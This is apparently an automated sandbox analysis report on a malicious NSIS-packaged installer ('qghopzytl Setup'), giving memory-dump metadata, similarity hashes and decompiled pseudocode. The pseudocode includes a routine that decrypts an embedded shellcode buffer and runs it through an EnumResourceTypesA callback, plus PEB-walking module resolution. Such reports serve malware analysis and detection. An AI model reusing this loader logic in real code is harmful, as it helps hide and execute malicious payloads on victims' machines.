              0x00406616
              0x00406616
              0x00406619
              0x0040661b
              0x00000000
              0x00406621
              0x00406621
              0x00406625
              0x00406630
              0x00406643
              0x00406648
              0x0040664d
              0x0040664f
              0x00000000
              0x00000000
              0x00406655
              0x00406655
              0x00406658
              0x0040665a
              0x00406668
              0x00406668
              0x0040666b
              0x0040666b
              0x0040666e
              0x00406671
              0x00406674
              0x00406677
              0x0040667a
              0x0040667d
              0x00000000
              0x0040667d
              0x0040665c
              0x0040665c
              0x00406662
              0x00000000
              0x00000000
              0x00000000
              0x00406662
              0x00000000
              0x00000000
              0x00000000
              0x00406a01
              0x00406a01
              0x00406a07
              0x00406a0d
              0x00406a12
              0x00406a18
              0x00406a1e
              0x00406a20
              0x00406a23
              0x00406a2c
              0x00406a32
              0x00406a32
              0x00406a25
              0x00406a27
              0x00406a29
              0x00406a29
              0x00406a34
              0x00406a36
              0x00406a39
              0x00406a74
              0x00406a74
              0x00000000
              0x00406a3b
              0x00406a3b
              0x00406a3b
              0x00406a41
              0x00406a44
              0x00406a46
              0x00406a7b
              0x00406a7d
              0x00000000
              0x00406a7d
              0x00000000
              0x00406a46
              0x00000000
              0x00406085
              0x00406a53
              0x00000000
              0x00406a53
              0x00406467
              0x00406469
              0x00000000
              0x00000000
              0x0040646b
              0x0040646b
              0x0040646e
              0x00000000
              0x0040646e
              0x004063b3
              0x00406374
              0x00406a58
              0x00406a5b
              0x00406a5d
              0x00406a66
              0x00406a6c
              0x00000000

              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
              • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
              • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
              • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
              				signed int _v8;
              				unsigned int _v12;
              				signed int _v16;
              				intOrPtr _v20;
              				signed int _v24;
              				signed int _v28;
              				intOrPtr* _v32;
              				signed int* _v36;
              				signed int _v40;
              				signed int _v44;
              				intOrPtr _v48;
              				intOrPtr _v52;
              				void _v116;
              				signed int _v176;
              				signed int _v180;
              				signed int _v240;
              				signed int _t166;
              				signed int _t168;
              				intOrPtr _t175;
              				signed int _t181;
              				void* _t182;
              				intOrPtr _t183;
              				signed int* _t184;
              				signed int _t186;
              				signed int _t187;
              				signed int* _t189;
              				signed int _t190;
              				intOrPtr* _t191;
              				intOrPtr _t192;
              				signed int _t193;
              				signed int _t195;
              				signed int _t200;
              				signed int _t205;
              				void* _t207;
              				short _t208;
              				signed char _t222;
              				signed int _t224;
              				signed int _t225;
              				signed int* _t232;
              				signed int _t233;
              				signed int _t234;
              				void* _t235;
              				signed int _t236;
              				signed int _t244;
              				signed int _t246;
              				signed int _t251;
              				signed int _t254;
              				signed int _t256;
              				signed int _t259;
              				signed int _t262;
              				void* _t263;
              				void* _t264;
              				signed int _t267;
              				intOrPtr _t269;
              				intOrPtr _t271;
              				signed int _t274;
              				intOrPtr* _t275;
              				unsigned int _t276;
              				void* _t277;
              				signed int _t278;
              				intOrPtr* _t279;
              				signed int _t281;
              				intOrPtr _t282;
              				intOrPtr _t283;
              				signed int* _t284;
              				signed int _t286;
              				signed int _t287;
              				signed int _t288;
              				signed int _t296;
              				signed int* _t297;
              				intOrPtr _t298;
              				void* _t299;
              
              				_t278 = _a8;
              				_t187 = 0x10;
              				memset( &_v116, 0, _t187 << 2);
              				_t189 = _a4;
              				_t233 = _t278;
              				do {
              					_t166 =  *_t189;
              					_t189 =  &(_t189[1]);
              					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
              					_t233 = _t233 - 1;
              				} while (_t233 != 0);
              				if(_v116 != _t278) {
              					_t279 = _a28;
              					_t267 =  *_t279;
              					_t190 = 1;
              					_a28 = _t267;
              					_t234 = 0xf;
              					while(1) {
              						_t168 = 0;
              						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
              							break;
              						}
              						_t190 = _t190 + 1;
              						if(_t190 <= _t234) {
              							continue;
              						}
              						break;
              					}
              					_v8 = _t190;
              					if(_t267 < _t190) {
              						_a28 = _t190;
              					}
              					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
              						_t234 = _t234 - 1;
              						if(_t234 != 0) {
              							continue;
              						}
              						break;
              					}
              					_v28 = _t234;
              					if(_a28 > _t234) {
              						_a28 = _t234;
              					}
              					 *_t279 = _a28;
              					_t181 = 1 << _t190;
              					while(_t190 < _t234) {
              						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
              						if(_t182 < 0) {
              							L64:
              							return _t168 | 0xffffffff;
              						}
              						_t190 = _t190 + 1;
              						_t181 = _t182 + _t182;
              					}
              					_t281 = _t234 << 2;
              					_t191 = _t299 + _t281 - 0x70;
              					_t269 =  *_t191;
              					_t183 = _t181 - _t269;
              					_v52 = _t183;
              					if(_t183 < 0) {
              						goto L64;
              					}
              					_v176 = _t168;
              					 *_t191 = _t269 + _t183;
              					_t192 = 0;
              					_t235 = _t234 - 1;
              					if(_t235 == 0) {
              						L21:
              						_t184 = _a4;
              						_t271 = 0;
              						do {
              							_t193 =  *_t184;
              							_t184 =  &(_t184[1]);
              							if(_t193 != _t168) {
              								_t232 = _t299 + _t193 * 4 - 0xb0;
              								_t236 =  *_t232;
              								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
              								 *_t232 = _t236 + 1;
              							}
              							_t271 = _t271 + 1;
              						} while (_t271 < _a8);
              						_v16 = _v16 | 0xffffffff;
              						_v40 = _v40 & 0x00000000;
              						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
              						_t195 = _v8;
              						_t186 =  ~_a28;
              						_v12 = _t168;
              						_v180 = _t168;
              						_v36 = 0x42ceb8;
              						_v240 = _t168;
              						if(_t195 > _v28) {
              							L62:
              							_t168 = 0;
              							if(_v52 == 0 || _v28 == 1) {
              								return _t168;
              							} else {
              								goto L64;
              							}
              						}
              						_v44 = _t195 - 1;
              						_v32 = _t299 + _t195 * 4 - 0x70;
              						do {
              							_t282 =  *_v32;
              							if(_t282 == 0) {
              								goto L61;
              							}
              							while(1) {
              								_t283 = _t282 - 1;
              								_t200 = _a28 + _t186;
              								_v48 = _t283;
              								_v24 = _t200;
              								if(_v8 <= _t200) {
              									goto L45;
              								}
              								L31:
              								_v20 = _t283 + 1;
              								do {
              									_v16 = _v16 + 1;
              									_t296 = _v28 - _v24;
              									if(_t296 > _a28) {
              										_t296 = _a28;
              									}
              									_t222 = _v8 - _v24;
              									_t254 = 1 << _t222;
              									if(1 <= _v20) {
              										L40:
              										_t256 =  *_a36;
              										_t168 = 1 << _t222;
              										_v40 = 1;
              										_t274 = _t256 + 1;
              										if(_t274 > 0x5a0) {
              											goto L64;
              										}
              									} else {
              										_t275 = _v32;
              										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
              										if(_t222 >= _t296) {
              											goto L40;
              										}
              										while(1) {
              											_t222 = _t222 + 1;
              											if(_t222 >= _t296) {
              												goto L40;
              											}
              											_t275 = _t275 + 4;
              											_t264 = _t263 + _t263;
              											_t175 =  *_t275;
              											if(_t264 <= _t175) {
              												goto L40;
              											}
              											_t263 = _t264 - _t175;
              										}
              										goto L40;
              									}
              									_t168 = _a32 + _t256 * 4;
              									_t297 = _t299 + _v16 * 4 - 0xec;
              									 *_a36 = _t274;
              									_t259 = _v16;
              									 *_t297 = _t168;
              									if(_t259 == 0) {
              										 *_a24 = _t168;
              									} else {
              										_t276 = _v12;
              										_t298 =  *((intOrPtr*)(_t297 - 4));
              										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
              										_a5 = _a28;
              										_a4 = _t222;
              										_t262 = _t276 >> _t186;
              										_a6 = (_t168 - _t298 >> 2) - _t262;
              										 *(_t298 + _t262 * 4) = _a4;
              									}
              									_t224 = _v24;
              									_t186 = _t224;
              									_t225 = _t224 + _a28;
              									_v24 = _t225;
              								} while (_v8 > _t225);
              								L45:
              								_t284 = _v36;
              								_a5 = _v8 - _t186;
              								if(_t284 < 0x42ceb8 + _a8 * 4) {
              									_t205 =  *_t284;
              									if(_t205 >= _a12) {
              										_t207 = _t205 - _a12 + _t205 - _a12;
              										_v36 =  &(_v36[1]);
              										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
              										_t208 =  *((intOrPtr*)(_t207 + _a16));
              									} else {
              										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
              										_t208 =  *_t284;
              										_v36 =  &(_t284[1]);
              									}
              									_a6 = _t208;
              								} else {
              									_a4 = 0xc0;
              								}
              								_t286 = 1 << _v8 - _t186;
              								_t244 = _v12 >> _t186;
              								while(_t244 < _v40) {
              									 *(_t168 + _t244 * 4) = _a4;
              									_t244 = _t244 + _t286;
              								}
              								_t287 = _v12;
              								_t246 = 1 << _v44;
              								while((_t287 & _t246) != 0) {
              									_t287 = _t287 ^ _t246;
              									_t246 = _t246 >> 1;
              								}
              								_t288 = _t287 ^ _t246;
              								_v20 = 1;
              								_v12 = _t288;
              								_t251 = _v16;
              								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
              									L60:
              									if(_v48 != 0) {
              										_t282 = _v48;
              										_t283 = _t282 - 1;
              										_t200 = _a28 + _t186;
              										_v48 = _t283;
              										_v24 = _t200;
              										if(_v8 <= _t200) {
              											goto L45;
              										}
              										goto L31;
              									}
              									break;
              								} else {
              									goto L58;
              								}
              								do {
              									L58:
              									_t186 = _t186 - _a28;
              									_t251 = _t251 - 1;
              								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
              								_v16 = _t251;
              								goto L60;
              							}
              							L61:
              							_v8 = _v8 + 1;
              							_v32 = _v32 + 4;
              							_v44 = _v44 + 1;
              						} while (_v8 <= _v28);
              						goto L62;
              					}
              					_t277 = 0;
              					do {
              						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
              						_t277 = _t277 + 4;
              						_t235 = _t235 - 1;
              						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
              					} while (_t235 != 0);
              					goto L21;
              				}
              				 *_a24 =  *_a24 & 0x00000000;
              				 *_a28 =  *_a28 & 0x00000000;
              				return 0;
              			}

              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
              • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
              • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
              • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E7306754F() {
              				int _t105;
              				void* _t219;
              
              				L0:
              				while(1) {
              					L0:
              					 *(_t219 - 8) =  *(_t219 - 8) + 1;
              					L1:
              					if( *(_t219 - 8) < 0x1495) {
              						L2:
              						_t5 = E7306B070 +  *(_t219 - 8); // 0x25000000
              						 *(_t219 - 1) =  *_t5;
              						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^  *(_t219 - 8);
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t219 - 1) & 0x000000ff) << 0x00000007;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0xdc;
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x00000074;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) -  *(_t219 - 8);
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x00000043;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t219 - 1) & 0x000000ff) << 0x00000007;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0xbc;
              						 *(_t219 - 1) =  !( *(_t219 - 1) & 0x000000ff);
              						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) - 0xd9;
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x0000008d;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t219 - 1) & 0x000000ff) << 0x00000006;
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^  *(_t219 - 8);
              						 *(_t219 - 1) =  !( *(_t219 - 1) & 0x000000ff);
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x00000021;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t219 - 1) & 0x000000ff) << 0x00000001;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) +  *(_t219 - 8);
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000f3;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) - 0x14;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t219 - 1) & 0x000000ff) << 0x00000003;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0x96;
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000e9;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) +  *(_t219 - 8);
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x0000002b;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0xf7;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t219 - 1) & 0x000000ff) << 0x00000001;
              						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x0000001b;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) - 0x82;
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000e1;
              						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t219 - 1) & 0x000000ff) << 0x00000007;
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^ 0x000000a0;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) + 0x26;
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t219 - 1) & 0x000000ff) << 0x00000006;
              						 *(_t219 - 1) =  *(_t219 - 1) & 0x000000ff ^  *(_t219 - 8);
              						 *(_t219 - 1) = ( *(_t219 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t219 - 1) & 0x000000ff) << 0x00000001;
              						 *(_t219 - 1) =  ~( *(_t219 - 1) & 0x000000ff);
              						 *((char*)(E7306B070 +  *(_t219 - 8))) =  *(_t219 - 1);
              						continue;
              					}
              					L3:
              					_t105 = EnumResourceTypesA(0, E7306B070, 0); // executed
              					L4:
              					return _t105;
              					L5:
              				}
              			}






              APIs
              • EnumResourceTypesA.KERNEL32(00000000,7306B070,00000000), ref: 7306777D
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID: EnumResourceTypes
              • String ID:
              • API String ID: 29811550-0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E7306B7B4(void* __ecx, void* __eflags) {
              				void* _t10;
              				intOrPtr* _t14;
              				intOrPtr* _t15;
              
              				_t10 = __ecx;
              				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
              				_t15 = _t14;
              				while(E7306B686( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
              					_t15 =  *_t15;
              					if(_t15 != _t14) {
              						continue;
              					}
              					return 0;
              				}
              				return  *((intOrPtr*)(_t15 + 0x28));
              			}







              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E7306B737() {
              
              				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
              			}




              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 84%
              			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
              				struct HWND__* _v32;
              				void* _v84;
              				void* _v88;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t35;
              				signed int _t37;
              				signed int _t39;
              				intOrPtr _t44;
              				struct HWND__* _t49;
              				signed int _t67;
              				struct HWND__* _t73;
              				signed int _t86;
              				struct HWND__* _t91;
              				signed int _t99;
              				int _t103;
              				signed int _t115;
              				signed int _t116;
              				int _t117;
              				signed int _t122;
              				struct HWND__* _t125;
              				struct HWND__* _t126;
              				int _t127;
              				long _t130;
              				int _t132;
              				int _t133;
              				void* _t134;
              				void* _t142;
              
              				_t115 = _a8;
              				if(_t115 == 0x110 || _t115 == 0x408) {
              					_t35 = _a12;
              					_t125 = _a4;
              					__eflags = _t115 - 0x110;
              					 *0x42a084 = _t35;
              					if(_t115 == 0x110) {
              						 *0x42ec28 = _t125;
              						 *0x42a098 = GetDlgItem(_t125, 1);
              						_t91 = GetDlgItem(_t125, 2);
              						_push(0xffffffff);
              						_push(0x1c);
              						 *0x429060 = _t91;
              						E00403E83(_t125);
              						SetClassLongA(_t125, 0xfffffff2,  *0x42e408);
              						 *0x42e3ec = E0040140B(4);
              						_t35 = 1;
              						__eflags = 1;
              						 *0x42a084 = 1;
              					}
              					_t122 =  *0x4091ac; // 0xffffffff
              					_t133 = 0;
              					_t130 = (_t122 << 6) +  *0x42ec40;
              					__eflags = _t122;
              					if(_t122 < 0) {
              						L34:
              						E00403ECF(0x40b);
              						while(1) {
              							_t37 =  *0x42a084;
              							 *0x4091ac =  *0x4091ac + _t37;
              							_t130 = _t130 + (_t37 << 6);
              							_t39 =  *0x4091ac; // 0xffffffff
              							__eflags = _t39 -  *0x42ec44; // 0x2
              							if(__eflags == 0) {
              								E0040140B(1);
              							}
              							__eflags =  *0x42e3ec - _t133; // 0x0
              							if(__eflags != 0) {
              								break;
              							}
              							_t44 =  *0x42ec44; // 0x2
              							__eflags =  *0x4091ac - _t44; // 0xffffffff
              							if(__eflags >= 0) {
              								break;
              							}
              							_t116 =  *(_t130 + 0x14);
              							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
              							_push( *((intOrPtr*)(_t130 + 0x20)));
              							_push(0xfffffc19);
              							E00403E83(_t125);
              							_push( *((intOrPtr*)(_t130 + 0x1c)));
              							_push(0xfffffc1b);
              							E00403E83(_t125);
              							_push( *((intOrPtr*)(_t130 + 0x28)));
              							_push(0xfffffc1a);
              							E00403E83(_t125);
              							_t49 = GetDlgItem(_t125, 3);
              							__eflags =  *0x42ecac - _t133; // 0x0
              							_v32 = _t49;
              							if(__eflags != 0) {
              								_t116 = _t116 & 0x0000fefd | 0x00000004;
              								__eflags = _t116;
              							}
              							ShowWindow(_t49, _t116 & 0x00000008);
              							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
              							E00403EA5(_t116 & 0x00000002);
              							_t117 = _t116 & 0x00000004;
              							EnableWindow( *0x429060, _t117);
              							__eflags = _t117 - _t133;
              							if(_t117 == _t133) {
              								_push(1);
              							} else {
              								_push(_t133);
              							}
              							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
              							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
              							__eflags =  *0x42ecac - _t133; // 0x0
              							if(__eflags == 0) {
              								_push( *0x42a098);
              							} else {
              								SendMessageA(_t125, 0x401, 2, _t133);
              								_push( *0x429060);
              							}
              							E00403EB8();
              							E00405BC7(0x42a0a0, "qghopzytl Setup");
              							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
              							SetWindowTextA(_t125, 0x42a0a0);
              							_push(_t133);
              							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
              							__eflags = _t67;
              							if(_t67 != 0) {
              								continue;
              							} else {
              								__eflags =  *_t130 - _t133;
              								if( *_t130 == _t133) {
              									continue;
              								}
              								__eflags =  *(_t130 + 4) - 5;
              								if( *(_t130 + 4) != 5) {
              									DestroyWindow( *0x42e3f8);
              									 *0x429870 = _t130;
              									__eflags =  *_t130 - _t133;
              									if( *_t130 <= _t133) {
              										goto L58;
              									}
              									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
              									__eflags = _t73 - _t133;
              									 *0x42e3f8 = _t73;
              									if(_t73 == _t133) {
              										goto L58;
              									}
              									_push( *((intOrPtr*)(_t130 + 0x2c)));
              									_push(6);
              									E00403E83(_t73);
              									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
              									ScreenToClient(_t125, _t134 + 0x10);
              									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
              									_push(_t133);
              									E00401389( *((intOrPtr*)(_t130 + 0xc)));
              									__eflags =  *0x42e3ec - _t133; // 0x0
              									if(__eflags != 0) {
              										goto L61;
              									}
              									ShowWindow( *0x42e3f8, 8);
              									E00403ECF(0x405);
              									goto L58;
              								}
              								__eflags =  *0x42ecac - _t133; // 0x0
              								if(__eflags != 0) {
              									goto L61;
              								}
              								__eflags =  *0x42eca0 - _t133; // 0x0
              								if(__eflags != 0) {
              									continue;
              								}
              								goto L61;
              							}
              						}
              						DestroyWindow( *0x42e3f8);
              						 *0x42ec28 = _t133;
              						EndDialog(_t125,  *0x429468);
              						goto L58;
              					} else {
              						__eflags = _t35 - 1;
              						if(_t35 != 1) {
              							L33:
              							__eflags =  *_t130 - _t133;
              							if( *_t130 == _t133) {
              								goto L61;
              							}
              							goto L34;
              						}
              						_push(0);
              						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
              						__eflags = _t86;
              						if(_t86 == 0) {
              							goto L33;
              						}
              						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
              						__eflags =  *0x42e3ec - _t133; // 0x0
              						return 0 | __eflags == 0x00000000;
              					}
              				} else {
              					_t125 = _a4;
              					_t133 = 0;
              					if(_t115 == 0x47) {
              						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
              					}
              					if(_t115 == 5) {
              						asm("sbb eax, eax");
              						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
              					}
              					if(_t115 != 0x40d) {
              						__eflags = _t115 - 0x11;
              						if(_t115 != 0x11) {
              							__eflags = _t115 - 0x111;
              							if(_t115 != 0x111) {
              								L26:
              								return E00403EEA(_t115, _a12, _a16);
              							}
              							_t132 = _a12 & 0x0000ffff;
              							_t126 = GetDlgItem(_t125, _t132);
              							__eflags = _t126 - _t133;
              							if(_t126 == _t133) {
              								L13:
              								__eflags = _t132 - 1;
              								if(_t132 != 1) {
              									__eflags = _t132 - 3;
              									if(_t132 != 3) {
              										_t127 = 2;
              										__eflags = _t132 - _t127;
              										if(_t132 != _t127) {
              											L25:
              											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
              											goto L26;
              										}
              										__eflags =  *0x42ecac - _t133; // 0x0
              										if(__eflags == 0) {
              											_t99 = E0040140B(3);
              											__eflags = _t99;
              											if(_t99 != 0) {
              												goto L26;
              											}
              											 *0x429468 = 1;
              											L21:
              											_push(0x78);
              											L22:
              											E00403E5C();
              											goto L26;
              										}
              										E0040140B(_t127);
              										 *0x429468 = _t127;
              										goto L21;
              									}
              									__eflags =  *0x4091ac - _t133; // 0xffffffff
              									if(__eflags <= 0) {
              										goto L25;
              									}
              									_push(0xffffffff);
              									goto L22;
              								}
              								_push(_t132);
              								goto L22;
              							}
              							SendMessageA(_t126, 0xf3, _t133, _t133);
              							_t103 = IsWindowEnabled(_t126);
              							__eflags = _t103;
              							if(_t103 == 0) {
              								goto L61;
              							}
              							goto L13;
              						}
              						SetWindowLongA(_t125, _t133, _t133);
              						return 1;
              					} else {
              						DestroyWindow( *0x42e3f8);
              						 *0x42e3f8 = _a12;
